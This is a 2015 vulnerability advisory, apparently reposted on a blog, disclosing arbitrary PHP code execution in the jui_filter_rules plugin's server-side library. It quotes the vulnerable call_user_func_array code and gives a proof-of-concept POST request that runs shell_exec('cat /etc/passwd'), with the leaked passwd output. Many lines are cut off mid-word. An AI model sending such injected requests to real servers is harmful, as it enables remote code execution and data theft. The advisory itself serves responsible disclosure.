==============================
Researcher: Timo Schmid <tschmid@ernw.de>
Description
===========
jui_filter_rules[1] is a jQuery plugin which allows users to generate a
ruleset
which could be used to filter datasets inside a web application.
The plugin also provides a PHP library to turn the user submitted
ruleset into
SQL where statements for server side filtering.
This PHP library contains a feature which allows to convert the
submitted filter
values with server side functions. These functions can be specified
within the
ruleset, which leads to an arbitrary PHP code execution.
Exploitation Technique
======================
Remote
Severity Level
==============
Critical
CVSS Base Score
===============
6.8 (AV:N / AC:M / Au:N / C:P / I:P / A:P)
CVE-ID
======
<unassigned>
Impact
======
By using the provided rule parsing library to generate SQL statements, an
attacker is capable of executing arbitrary PHP code in the context of the
web server. This could lead to a full compromise of the web server. The
attack vector could be limited by existing validation mechanisms around the
library, but this would require a partial manual parsing of the user
supplied
rules.
Status
======
Reported
Vulnerable Code Section
=======================
server_side/php/jui_filter_
[...]
private function create_filter_value_sql($
[...]
if(is_array($filter_value_
$function_name =
$filter_value_conversion_
$args = $filter_value_conversion_
$arg_len = count($args);
for($i = 0; $i < $vlen; $i++) {
// create arguments values for this filter value
$conversion_args = array();
for($a = 0; $a < $arg_len; $a++) {
if(array_key_exists('filter_
array_push($conversion_args, $a_values[$i]);
}
if(array_key_exists('value', $args[$a])) {
array_push($conversion_args, $args[$a]['value']);
}
}
// execute user function and assign return value to filter value
try {
$a_values[$i] = call_user_func_array($
$conversion_args);
} catch(Exception $e) {
$this->last_error = array(
'element_rule_id' => $element_rule_id,
'error_message' => $e->getMessage()
);
break;
}
}
}
[...]
The provided PHP parsing library allows to specify a PHP function to convert
the supplied filter value on the server side. This leads ultimatively to
code
execution through attacker supplied input. As no whitelist approach is used,
any existing PHP function could be executed (including shell commands).
Proof of Concept
================
Using the demo application from the git repository:
Executing shell_exec('cat /etc/passwd')
Request:
POST /ajax_create_sql.dist.php HTTP/1.0
host: http://www.example.com
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-
Content-Length: 471
a_rules%5B0%5D%5Bfilter_value_
ll_exec&a_rules%5B0%5D%
r_value_conversion_server_
swd&pst_placeholder=question_
ps=yes&a_rules%5B0%5D%
ndition%5D%5Boperator%5D=
ate
Response:
HTTP/1.1 200 OK
Date: Tue, 13 Jan 2015 02:12:33 GMT
Server: Apache/2.2.22 (Debian)
Content-Length: 530
Content-Type: text/html
{"sql":"WHERE \nsome_field = ?","bind_params":"root:x:0:0:
COSMOS:/root:/
bin/bash\ndaemon:x:1:1:daemon:
ys:x:3:3:sys:/dev:/bin/sh\
mes:/usr/games:/bin/sh\nman:x:
r/spool/lpd:/bin/sh\nmail:x:8:
pool/news:/bin/sh\nuucp:x:10:
oxy:/bin:/bin/sh\nwww-data:x:
Solution
========
This functionality should generally be removed or replaced by a mapping/
whitelist approach and strict type filtering to prevent arbitrary code
execution.
Affected Versions
=================
>= git commit b1e795eeba1bac2f9b0d383cd3da24
< 1.0.6 (commit 0b61463cd02cc1814046b516242779
Timeline
========
2015-01-12: Vulnerability found
2015-01-13: Developer informed
2015-02-14: Fixed in version 1.0.6 (git
0b61463cd02cc1814046b516242779
References
==========
[1] http://www.pontikis.net/labs/
[2] https://www.owasp.org/index.
[3] https://www.ernw.de/download/
[4] https://bufferoverflow.eu/BC-
Advisory-ID
===========
BC-1501
Disclaimer
==========
The information herein contained may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are NO
warranties, implied or otherwise, with regard to this information or its
use.
Any use of this information is at the user's risk. In no event shall the
author/
distributor be held liable for any damages whatsoever arising out of or in
connection with the use or spread of this information.
- --
Timo Schmid
ERNW GmbH, Carl-Bosch-Str. 4, 69115 Heidelberg - www.ernw.de
Tel. +49 6221 48039-0 (HQ) - Fax +49 6221 419008 - Cell +49 151 16227192
PGP-FP 971B D4F7 5DD1 FCED 11FC 2C61 7AB6 927D 6F26 6CE0
Handelsregister Mannheim: HRB 337135
Geschaeftsfuehrer: Enno Rey
==============================
|| Blog: www.insinuator.net | | Conference: www.troopers.de ||
==============================
================== TROOPERS15 ==================
* International IT Security Conference & Workshops
* 16th - 20st March 2015 / Heidelberg, Germany
* www.troopers.de
==============================
Komentarų nėra:
Rašyti komentarą